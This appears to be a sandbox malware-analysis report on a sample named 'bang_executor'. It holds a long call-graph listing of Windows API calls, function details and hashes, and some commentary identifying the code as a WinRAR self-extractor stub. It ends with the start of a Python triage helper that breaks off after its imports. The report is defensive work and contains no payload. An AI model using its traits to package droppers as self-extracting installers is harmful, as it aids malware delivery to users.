25491 4fe03c 25482->25491 25492 4fde84 GetModuleFileNameW 25482->25492 25493 4fe032 25482->25493 25488 4e4c00 _swprintf 51 API calls 25483->25488 25484 4fe4a1 25708 4fbe55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25484->25708 25610 4e1341 GetDlgItem ShowWindow 25485->25610 25486->25467 25495 4fea07 122 API calls 25486->25495 25487->25449 25487->25484 25498 4f0597 53 API calls 25487->25498 25488->25457 25501 4f0597 53 API 
calls 25491->25501 25701 4f12bc 82 API calls 25492->25701 25493->25392 25493->25491 25497 4fde12 25494->25497 25502 4fe3e1 25495->25502 25496 4fe0a7 25611 4e1341 GetDlgItem ShowWindow 25496->25611 25600 4eb01e 25497->25600 25498->25487 25499 4fe4bd 25499->25449 25505 4fe046 25501->25505 25502->25467 25507 4fe3ea DialogBoxParamW 25502->25507 25504 4fdeac 25509 4e4c00 _swprintf 51 API calls 25504->25509 25506 4e4c00 _swprintf 51 API calls 25505->25506 25511 4fe064 25506->25511 25507->25392 25507->25467 25508 4fe0b1 25513 4f0597 53 API calls 25508->25513 25510 4fdece CreateFileMappingW 25509->25510 25514 4fdf2c GetCommandLineW 25510->25514 25548 4fdfa3 __InternalCxxFrameHandler 25510->25548 25522 4f0597 53 API calls 25511->25522 25515 4fe0bb SetDlgItemTextW 25513->25515 25518 4fdf3d 25514->25518 25612 4e1341 GetDlgItem ShowWindow 25515->25612 25517 4fdfae ShellExecuteExW 25533 4fdfc9 25517->25533 25702 4fd705 SHGetMalloc 25518->25702 25519 4fde3f GetLastError 25520 4fde4a 25519->25520 25525 4eaf2f 80 API calls 25520->25525 25528 4fe07e 25522->25528 25524 4fe0cd SetDlgItemTextW GetDlgItem 25526 4fe0ea GetWindowLongW SetWindowLongW 25524->25526 25527 4fe102 25524->25527 25525->25479 25526->25527 25613 4fea07 25527->25613 25529 4fdf59 25703 4fd705 SHGetMalloc 25529->25703 25532 4fe110 25536 4fea07 122 API calls 25532->25536 25537 4fdfde WaitForInputIdle 25533->25537 25538 4fe00c 25533->25538 25534 4fdf65 25704 4fd705 SHGetMalloc 25534->25704 25539 4fe11e 25536->25539 25540 4fdff3 25537->25540 25538->25493 25545 4fe022 UnmapViewOfFile CloseHandle 25538->25545 25644 4ffdf7 25539->25644 25540->25538 25544 4fdff8 Sleep 25540->25544 25541 4fdf71 25705 4f136b 82 API calls 25541->25705 25544->25538 25544->25540 25545->25493 25547 4fdf82 MapViewOfFile 25547->25548 25548->25517 25555 4e13c8 25554->25555 25557 4e136f 25554->25557 25712 4f021d GetWindowLongW SetWindowLongW 25555->25712 25558 4e13d5 25557->25558 25711 4f0244 62 API calls 3 library calls 25557->25711 25558->25382 
25558->25383 25558->25385 25560 4e1391 25560->25558 25561 4e13a4 GetDlgItem 25560->25561 25561->25558 25562 4e13b4 25561->25562 25562->25558 25563 4e13ba SetWindowTextW 25562->25563 25563->25558 25713 4fd864 PeekMessageW 25564->25713 25567 4ff86e SendMessageW SendMessageW 25569 4ff8ae 25567->25569 25570 4ff8cd SendMessageW SendMessageW SendMessageW 25567->25570 25568 4ff836 25573 4ff841 ShowWindow SendMessageW SendMessageW 25568->25573 25569->25570 25571 4ff924 SendMessageW 25570->25571 25572 4ff901 SendMessageW 25570->25572 25574 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25571->25574 25572->25571 25573->25567 25575 4fdd62 25574->25575 25575->25435 25700 4fff24 5 API calls 2 library calls 25575->25700 25718 4fd392 GetCurrentProcess OpenProcessToken 25576->25718 25578 4fcee1 25579 4fcee9 SetEntriesInAclW 25578->25579 25582 4fcf75 25578->25582 25581 4fcf2a InitializeSecurityDescriptor 25579->25581 25579->25582 25580 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25583 4fcf82 25580->25583 25584 4fcf39 SetSecurityDescriptorDacl 25581->25584 25585 4fcf67 25581->25585 25582->25580 25583->25440 25584->25585 25586 4fcf4c CreateDirectoryW 25584->25586 25585->25582 25587 4fcf6c LocalFree 25585->25587 25586->25585 25587->25582 25592 4ebafb 25588->25592 25589 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25590 4ebbf0 25589->25590 25590->25452 25590->25453 25591 4ebba8 25593 4ebee1 13 API calls 25591->25593 25595 4ebbd0 25591->25595 25592->25591 25594 4ebbf9 25592->25594 25592->25595 25725 4ebee1 25592->25725 25593->25595 25740 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25594->25740 25595->25589 25598 4ebbfe 25599->25465 25601 4eb028 25600->25601 25602 4eb096 CreateFileW 25601->25602 25603 4eb08d 25601->25603 25602->25603 25604 4eb0dd 25603->25604 25605 4eda1e 6 API calls 25603->25605 25608 5010f9 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25604->25608 25606 4eb0c2 25605->25606 25606->25604 25607 4eb0c6 CreateFileW 25606->25607 25607->25604 25609 4eb111 25608->25609 25609->25519 25609->25520 25610->25496 25611->25508 25612->25524 25614 4fea19 25613->25614 25615 4ff717 25614->25615 25751 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25614->25751 25616 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25615->25616 25618 4ff732 25616->25618 25618->25532 25759 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25618->25759 25620 4ff741 25622 4fed57 SetWindowTextW 25628 4fea7c _wcslen _wcsrchr 25622->25628 25624 4edd18 5 API calls 25624->25628 25626 5066ae 22 API calls 25626->25628 25628->25615 25628->25618 25628->25622 25628->25624 25628->25626 25629 4feb4b SetFileAttributesW 25628->25629 25632 4feb65 __cftof _wcslen 25628->25632 25752 4fc5dd GetCurrentDirectoryW 25628->25752 25754 4ec3de 11 API calls 25628->25754 25755 4ec367 FindClose 25628->25755 25756 4fd76e 76 API calls 3 library calls 25628->25756 25758 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25628->25758 25631 4fec05 GetFileAttributesW 25629->25631 25629->25632 25631->25628 25633 4fec17 DeleteFileW 25631->25633 25632->25628 25639 4fef75 SendMessageW 25632->25639 25643 4febe1 SHFileOperationW 25632->25643 25753 4ed8ac 51 API calls 2 library calls 25632->25753 25757 4fd41c 100 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25632->25757 25633->25628 25640 4fec28 25633->25640 25636 4fef35 GetDlgItem SetWindowTextW SendMessageW 25636->25632 25637 4e4c00 _swprintf 51 API calls 25638 4fec48 GetFileAttributesW 25637->25638 25638->25640 25641 4fec5d MoveFileW 25638->25641 25639->25628 25640->25637 25641->25628 25642 4fec75 MoveFileExW 25641->25642 25642->25628 25643->25631 25645 4ffe13 25644->25645 25760 4f26df 
25645->25760 25647 4ffe59 25764 4e8ddf 25647->25764 25649 4ffeb7 25774 4e8ff5 25649->25774 25657 4ff9f8 25656->25657 25658 4fc556 4 API calls 25657->25658 25659 4ffa13 25658->25659 25660 4ffa1b GetWindow 25659->25660 25663 4ffae1 25659->25663 25660->25663 25665 4ffa34 25660->25665 25661 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25662 4fe256 25661->25662 25662->25394 25662->25395 25663->25661 25664 4ffa41 GetClassNameW 25664->25665 25665->25663 25665->25664 25666 4ffac9 GetWindow 25665->25666 25667 4ffa65 GetWindowLongW 25665->25667 25666->25663 25666->25665 25667->25666 25668 4ffa75 SendMessageW 25667->25668 25668->25666 25669 4ffa8b GetObjectW 25668->25669 26323 4fc595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25669->26323 25671 4ffaa2 26324 4fc574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25671->26324 26325 4fc79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25671->26325 25674 4ffab3 SendMessageW DeleteObject 25674->25666 25675->25406 25677 4fcb99 25676->25677 25678 4fcb74 25676->25678 25679 4fcb9e SHAutoComplete 25677->25679 25680 4fcba7 25677->25680 25678->25677 25682 4fcb8b FindWindowExW 25678->25682 25679->25680 25681 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25680->25681 25683 4fcbb2 25681->25683 25682->25677 25684 4fd243 25683->25684 25685 4fd255 25684->25685 25686 4e147c 43 API calls 25685->25686 25687 4fd2af 25686->25687 26326 4e20eb 25687->26326 25690 4fd2c5 25692 4e16b8 86 API calls 25690->25692 25691 4fd2d1 26333 4e1b0e 25691->26333 25694 4fd2cd 25692->25694 25695 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25694->25695 25697 4fd357 25695->25697 25696 4e16b8 86 API calls 25696->25694 25697->25437 25697->25441 25698 4fd2ed __InternalCxxFrameHandler ___std_exception_copy 25698->25696 25699->25480 25700->25435 25701->25504 25702->25529 25703->25534 25704->25541 25705->25547 25707->25478 25708->25499 25709->25468 25710->25461 
25711->25560 25712->25558 25714 4fd87f GetMessageW 25713->25714 25715 4fd8b8 GetDlgItem 25713->25715 25716 4fd895 IsDialogMessageW 25714->25716 25717 4fd8a4 TranslateMessage DispatchMessageW 25714->25717 25715->25567 25715->25568 25716->25715 25716->25717 25717->25715 25719 4fd3b2 GetTokenInformation 25718->25719 25724 4fd409 25718->25724 25720 4fd3cc GetLastError 25719->25720 25721 4fd3d7 ___std_exception_copy 25719->25721 25720->25721 25720->25724 25722 4fd3e0 GetTokenInformation 25721->25722 25723 4fd3fa CopySid 25722->25723 25722->25724 25723->25724 25724->25578 25726 4ebeee 25725->25726 25727 4ebf1c 25726->25727 25728 4ebf0f CreateDirectoryW 25726->25728 25729 4ebccb 8 API calls 25727->25729 25728->25727 25730 4ebf4f 25728->25730 25731 4ebf22 25729->25731 25733 4ebf5e 25730->25733 25741 4ec2e5 25730->25741 25732 4ebf62 GetLastError 25731->25732 25734 4eda1e 6 API calls 25731->25734 25732->25733 25736 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25733->25736 25737 4ebf38 25734->25737 25738 4ebf85 25736->25738 25737->25732 25739 4ebf3c CreateDirectoryW 25737->25739 25738->25592 25739->25730 25739->25732 25740->25598 25742 501590 25741->25742 25743 4ec2f2 SetFileAttributesW 25742->25743 25744 4ec33f 25743->25744 25745 4ec314 25743->25745 25747 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25744->25747 25746 4eda1e 6 API calls 25745->25746 25748 4ec326 25746->25748 25749 4ec34d 25747->25749 25748->25744 25750 4ec32a SetFileAttributesW 25748->25750 25749->25733 25750->25744 25751->25628 25752->25628 25753->25632 25754->25628 25755->25628 25756->25628 25757->25636 25758->25628 25759->25620 25761 4f26ec _wcslen 25760->25761 25793 4e1925 25761->25793 25763 4f2704 25763->25647 25765 4e8deb __EH_prolog3 25764->25765 25806 4eee0f 25765->25806 25767 4e8e0e 25768 50121c 27 API calls 25767->25768 25769 4e8e52 __cftof 25768->25769 25770 50121c 27 API calls 25769->25770 25771 4e8e7a 25770->25771 25812 4f6b0d 
25771->25812 25773 4e8eac 25773->25649 25775 4e8fff 25774->25775 25781 4e9080 25775->25781 25842 4ec37a 25775->25842 25777 4e9127 25779 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25777->25779 25782 4e914e 25779->25782 25780 4e90e5 25780->25777 25848 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25780->25848 25781->25780 25819 4e96b9 25781->25819 25784 4e8ebb 25782->25784 26314 4eab26 8 API calls __cftof 25784->26314 25786 4e8ee6 25788 4e8ef7 Concurrency::cancel_current_task 25786->25788 26315 4f4396 25786->26315 25789 4e2179 26 API calls 25788->25789 25790 4e8f1e 25789->25790 26321 4eeea4 86 API calls Concurrency::cancel_current_task 25790->26321 25794 4e1937 25793->25794 25801 4e198f 25793->25801 25795 4e1960 25794->25795 25803 4e7bad 76 API calls 2 library calls 25794->25803 25797 5066ae 22 API calls 25795->25797 25799 4e1980 25797->25799 25798 4e1956 25804 4e7c32 75 API calls 25798->25804 25799->25801 25805 4e7c32 75 API calls 25799->25805 25801->25763 25803->25798 25804->25795 25805->25801 25807 4eee1b __EH_prolog3 25806->25807 25808 50121c 27 API calls 25807->25808 25809 4eee59 25808->25809 25810 50121c 27 API calls 25809->25810 25811 4eee7d 25810->25811 25811->25767 25813 4f6b19 __EH_prolog3 25812->25813 25814 50121c 27 API calls 25813->25814 25815 4f6b33 25814->25815 25816 4f6b4a 25815->25816 25818 4f2f22 80 API calls 25815->25818 25816->25773 25818->25816 25820 4e96d4 25819->25820 25849 4e147c 25820->25849 25822 4e96fb 25823 4e970c 25822->25823 26012 4eb982 25822->26012 25827 4e9743 25823->25827 25859 4e1b63 25823->25859 25826 4e973f 25826->25827 25878 4e20a1 143 API calls __EH_prolog3 25826->25878 26004 4e16b8 25827->26004 25833 4e97e4 25879 4e988e 81 API calls 25833->25879 25835 4e97fe 25836 4e9842 25835->25836 25880 4f3cf2 25835->25880 25836->25827 25883 4e441e 25836->25883 25895 4e9906 25836->25895 25838 4e976b 25838->25833 25841 4ec37a 12 API calls 25838->25841 25841->25838 25843 4ec38f 
25842->25843 25847 4ec3bd 25843->25847 26301 4ec4a8 25843->26301 25846 4ec3a4 FindClose 25846->25847 25847->25775 25848->25777 25850 4e1488 __EH_prolog3 25849->25850 25851 4eee0f 27 API calls 25850->25851 25852 4e14b7 25851->25852 25853 50121c 27 API calls 25852->25853 25856 4e152b 25852->25856 25854 4e1518 25853->25854 25854->25856 26016 4e668f 25854->26016 26024 4ecc45 25856->26024 25858 4e15b3 __cftof 25858->25822 25860 4e1b6f __EH_prolog3 25859->25860 25872 4e1bbc 25860->25872 25874 4e1cef 25860->25874 26062 4e145d 25860->26062 25863 4e1d21 26065 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25863->26065 25865 4e441e 117 API calls 25869 4e1d6c 25865->25869 25866 4e1d2e 25866->25865 25866->25874 25867 4e1db4 25871 4e1de7 25867->25871 25867->25874 26066 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25867->26066 25869->25867 25870 4e441e 117 API calls 25869->25870 25870->25869 25871->25874 25877 4eb8c0 79 API calls 25871->25877 25872->25863 25872->25866 25872->25874 25873 4e441e 117 API calls 25875 4e1e38 25873->25875 25874->25826 25875->25873 25875->25874 25876 4eb8c0 79 API calls 25876->25872 25877->25875 25878->25838 25879->25835 26080 50029f 25880->26080 25884 4e442e 25883->25884 25885 4e442a 25883->25885 25894 4eb8c0 79 API calls 25884->25894 25885->25836 25886 4e4440 25887 4e445b 25886->25887 25888 4e4469 25886->25888 25891 4e449b 25887->25891 26090 4e3ab7 105 API calls 3 library calls 25887->26090 26091 4e2fcb 117 API calls 3 library calls 25888->26091 25891->25836 25892 4e4467 25892->25891 26092 4e25f4 74 API calls 25892->26092 25894->25886 25896 4e9918 25895->25896 25899 4e997a 25896->25899 25908 4e9da2 Concurrency::cancel_current_task 25896->25908 26150 4fab94 118 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25896->26150 25897 4ea820 25900 4ea86c 25897->25900 25901 4ea825 25897->25901 25899->25897 25905 4e999b 25899->25905 25899->25908 25900->25908 26182 4fab94 118 API calls 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25900->26182 25901->25908 26181 4e8c06 168 API calls 25901->26181 25902 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25903 4ea862 25902->25903 25903->25836 25905->25908 26093 4e6936 25905->26093 25908->25902 25909 4e9a71 26099 4ed63a 25909->26099 25911 4e9bba 25911->25908 25918 4e9ce2 25911->25918 26153 4e9582 38 API calls 25911->26153 25913 4e9aa4 25913->25911 26151 4ebf89 57 API calls 4 library calls 25913->26151 25917 4e9c24 26152 509ea8 26 API calls 2 library calls 25917->26152 25920 4ec37a 12 API calls 25918->25920 25927 4e9d40 25918->25927 25920->25927 25921 4ea0ac 26162 4ef014 97 API calls 25921->26162 25924 4e9dd1 25943 4e9e33 25924->25943 26154 4e4916 27 API calls 2 library calls 25924->26154 26103 4e8f84 25927->26103 25929 4ea004 25930 4ea0c3 25929->25930 25934 4ea033 25929->25934 25932 4ea118 25930->25932 25947 4ea0ce 25930->25947 25936 4ea09b 25932->25936 26164 4e93ac 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25932->26164 25933 4ea116 25937 4eaf2f 80 API calls 25933->25937 25934->25936 25938 4ebccb 8 API calls 25934->25938 25942 4ea174 25934->25942 25935 4ea7d9 25939 4eaf2f 80 API calls 25935->25939 25936->25933 25936->25942 25937->25908 25941 4ea068 25938->25941 25939->25908 25941->25936 26161 4eac09 97 API calls 25941->26161 25942->25935 25959 4ea1e2 25942->25959 26165 4eb288 25942->26165 25943->25908 25944 4e9f71 25943->25944 25953 4e9f78 Concurrency::cancel_current_task 25943->25953 26155 4e8db7 41 API calls 25943->26155 26156 4ef014 97 API calls 25943->26156 26157 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25943->26157 26158 4e953f 99 API calls 25943->26158 26159 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25944->26159 25947->25933 26163 4e9155 123 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25947->26163 25950 4ea231 25955 4ec94d 27 API calls 25950->25955 
25953->25929 26160 4ebd61 50 API calls 3 library calls 25953->26160 25972 4ea247 25955->25972 25957 4ea1d0 26169 4e7e45 77 API calls 25957->26169 26109 4ec94d 25959->26109 25960 4ea31d 25961 4ea37c 25960->25961 25962 4ea511 25960->25962 25963 4ea43c 25961->25963 25966 4ea394 25961->25966 25964 4ea537 25962->25964 25965 4ea523 25962->25965 25985 4ea3b5 25962->25985 25970 4ed63a 5 API calls 25963->25970 26124 4f53f0 25964->26124 26113 4eab81 25965->26113 25968 4ea3db 25966->25968 25977 4ea3a3 25966->25977 25968->25985 26172 4e88a9 113 API calls 25968->26172 25975 4ea466 25970->25975 25971 4ea2f4 25971->25960 26170 4eb427 82 API calls 25971->26170 25972->25960 25972->25971 25982 4eb1e6 79 API calls 25972->25982 25973 4ea550 26136 4f5099 25973->26136 26173 4e9582 38 API calls 25975->26173 26171 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25977->26171 25980 4ea502 25980->25836 25982->25971 25984 4ea47e 25984->25985 25986 4ea4ab 25984->25986 25987 4ea494 25984->25987 25985->25980 25990 4ea5c5 25985->25990 26176 4ec905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25985->26176 26175 4ea8b9 103 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25986->26175 26174 4e85fc 86 API calls 25987->26174 25995 4ea656 25990->25995 26177 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25990->26177 25992 4ea764 25992->25935 25994 4ec2e5 8 API calls 25992->25994 25993 4ea712 26145 4eb7e2 25993->26145 25996 4ea7bf 25994->25996 25995->25935 25995->25992 25995->25993 26178 4eb949 SetEndOfFile 25995->26178 25996->25935 26179 4e240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25996->26179 25999 4ea759 26001 4eafd0 77 API calls 25999->26001 26001->25992 26002 4ea7cf 26180 4e7d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26002->26180 26005 4e16ca 26004->26005 26007 4e16dc Concurrency::cancel_current_task 26004->26007 26005->26007 26295 4e1729 
26005->26295 26008 4e2179 26 API calls 26007->26008 26009 4e170b 26008->26009 26298 4eeea4 86 API calls Concurrency::cancel_current_task 26009->26298 26013 4eb999 26012->26013 26014 4eb9a3 26013->26014 26300 4e7c87 78 API calls 26013->26300 26014->25823 26017 4e669b __EH_prolog3 26016->26017 26032 4ed467 26017->26032 26019 4e66a5 26035 4f11a5 26019->26035 26021 4e66fc 26039 4e68b3 GetCurrentProcess GetProcessAffinityMask 26021->26039 26023 4e6719 26023->25856 26025 4ecc65 __cftof 26024->26025 26050 4ecb21 26025->26050 26030 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26031 4ecc95 26030->26031 26031->25858 26040 4ed4bd 26032->26040 26036 4f11b1 __EH_prolog3 26035->26036 26049 4e4a2c 41 API calls 26036->26049 26038 4f11ca 26038->26021 26039->26023 26041 4ed4cf __cftof 26040->26041 26044 4f31c2 26041->26044 26047 4f3184 GetCurrentProcess GetProcessAffinityMask 26044->26047 26048 4ed4b9 26047->26048 26048->26019 26049->26038 26057 4ecb02 26050->26057 26052 4ecb96 26053 4e2179 26052->26053 26054 4e2184 26053->26054 26055 4e2193 26053->26055 26061 4e13db 26 API calls Concurrency::cancel_current_task 26054->26061 26055->26030 26058 4ecb10 26057->26058 26059 4ecb0b 26057->26059 26058->26052 26060 4e2179 26 API calls 26059->26060 26060->26058 26061->26055 26067 4e18b2 26062->26067 26065->25874 26066->25871 26068 4e18c4 26067->26068 26069 4e1476 26067->26069 26070 4e18ed 26068->26070 26077 4e7bad 76 API calls 2 library calls 26068->26077 26069->25876 26072 5066ae 22 API calls 26070->26072 26074 4e190a 26072->26074 26073 4e18e3 26078 4e7c32 75 API calls 26073->26078 26074->26069 26079 4e7c32 75 API calls 26074->26079 26077->26073 26078->26070 26079->26069 26081 5002ac 26080->26081 26082 4f0597 53 API calls 26081->26082 26083 5002da 26082->26083 26084 4e4c00 _swprintf 51 API calls 26083->26084 26085 5002ec 26084->26085 26086 4ff7fc 21 API calls 26085->26086 26087 5002fd 26086->26087 26088 5010f9 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26087->26088 26089 4f3d08 26088->26089 26089->25836 26090->25892 26091->25892 26092->25891 26094 4e6946 26093->26094 26183 4e6852 26094->26183 26096 4e69b1 26096->25909 26097 4e6979 26097->26096 26188 4ed122 6 API calls 3 library calls 26097->26188 26101 4ed644 26099->26101 26100 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26102 4ed7d8 26100->26102 26101->26100 26102->25913 26104 4e8f99 26103->26104 26105 4e8fd1 26104->26105 26199 4e7e25 74 API calls 26104->26199 26105->25908 26105->25921 26105->25924 26107 4e8fc9 26200 4e1407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26107->26200 26110 4ec95b 26109->26110 26112 4ec965 26109->26112 26111 50121c 27 API calls 26110->26111 26111->26112 26112->25950 26114 4eab8d __EH_prolog3 26113->26114 26201 4e8fdb 26114->26201 26117 4e145d 78 API calls 26118 4eab9b 26117->26118 26204 4ef0d7 26118->26204 26120 4eabf6 26120->25985 26122 4ef0d7 133 API calls 26123 4eabae 26122->26123 26123->26120 26123->26122 26215 4ef2c3 97 API calls __InternalCxxFrameHandler 26123->26215 26125 4f5405 26124->26125 26128 4f540f ___std_exception_copy 26124->26128 26241 4e7c32 75 API calls 26125->26241 26127 4f553f 26243 5047d0 RaiseException 26127->26243 26128->26127 26129 4f5495 26128->26129 26132 4f54b9 __cftof 26128->26132 26242 4f5323 133 API calls 3 library calls 26129->26242 26132->25973 26134 4f556b 26135 4f559d 26134->26135 26244 4f517f 133 API calls 26134->26244 26135->25973 26137 4f50cb 26136->26137 26139 4f50a2 26136->26139 26143 4f50bf 26137->26143 26261 4f7576 138 API calls 2 library calls 26137->26261 26140 4f50c1 26139->26140 26142 4f50b7 26139->26142 26139->26143 26260 4f8250 133 API calls 26140->26260 26245 4f8c7e 26142->26245 26143->25985 26146 4eb7f3 26145->26146 26149 4eb802 26145->26149 26147 4eb7f9 FlushFileBuffers 26146->26147 26146->26149 26147->26149 26148 4eb87f SetFileTime 26148->25999 26149->26148 

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F290A: GetModuleHandleW.KERNEL32 ref: 004F2937
                                          • Part of subcall function 004F290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004F2949
                                          • Part of subcall function 004F290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004F2973
                                          • Part of subcall function 004FC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004FC5E5
                                          • Part of subcall function 004FCCD9: OleInitialize.OLE32(00000000), ref: 004FCCF2
                                          • Part of subcall function 004FCCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004FCD29
                                          • Part of subcall function 004FCCD9: SHGetMalloc.SHELL32(0052C460), ref: 004FCD33
                                        • GetCommandLineW.KERNEL32 ref: 005003C9
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005003F3
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00500404
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00500455
                                          • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE
                                          • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00500038
                                          • Part of subcall function 004F1421: _wcslen.LIBCMT ref: 004F1445
                                        • CloseHandle.KERNEL32(00000000), ref: 0050045C
                                        • GetModuleFileNameW.KERNEL32(00000000,00542CC0,00000800), ref: 00500476
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00542CC0), ref: 00500482
                                        • GetLocalTime.KERNEL32(?), ref: 0050048D
                                        • _swprintf.LIBCMT ref: 005004E1
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 005004F6
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 005004FD
                                        • LoadIconW.USER32(00000000,00000064), ref: 00500514
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00500565
                                        • Sleep.KERNELBASE(?), ref: 00500593
                                        • DeleteObject.GDI32 ref: 005005CC
                                        • DeleteObject.GDI32(?), ref: 005005DC
                                        • CloseHandle.KERNEL32 ref: 0050061F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$pPR$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                        • API String ID: 3014515783-2929405500
                                        • Opcode ID: 54f1e53e238cc103600b5800eec400d320033b134a080af8a86be01a11601032
                                        • Instruction ID: b66afe68b808a3ff74bc80decea5e5e24fc69d193f62add269ca3a643c88924f
                                        • Opcode Fuzzy Hash: 54f1e53e238cc103600b5800eec400d320033b134a080af8a86be01a11601032
                                        • Instruction Fuzzy Hash: 30712570500344ABD720AB62EC49BBF7FA8BF56709F00441AF645922E2DF758D4CDBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%
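
The API sequence above (OpenFileMappingW on winrarsfxmappingfile.tmp, SetEnvironmentVariableW for sfxcmd/sfxpar, sfxname set from the GetModuleFileNameW buffer and sfxstime from GetLocalTime formatted as %4d-%02d-%02d-%02d-%02d-%02d-%03d, then DialogBoxParamW on STARTDLG) is the stock behaviour of a WinRAR self-extracting (SFX) stub. The dropper behaviour of this sample therefore lives in the RAR archive appended to the stub and in that archive's SFX comment script, not in the stub code whose functions are listed here, so triage should carve and analyse the embedded archive. The following Python helper is an added example written for this page, not code from the Joe Sandbox report or from WinRAR: it parses API lines in the report's "Api.MODULE(args), ref: addr" format, counts the SFX indicators visible in the listing, and locates the RAR4/RAR5 signature inside an SFX image. The indicator table, the report excerpt and the sample bytes embedded in the script are assumptions or constructed test data.

```python
"""Triage helper for a WinRAR-style SFX stub seen in a sandbox function listing.

Added example for this page; not part of the Joe Sandbox report or of WinRAR.
Indicator names, the report excerpt and SAMPLE_SFX below are constructed test data.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

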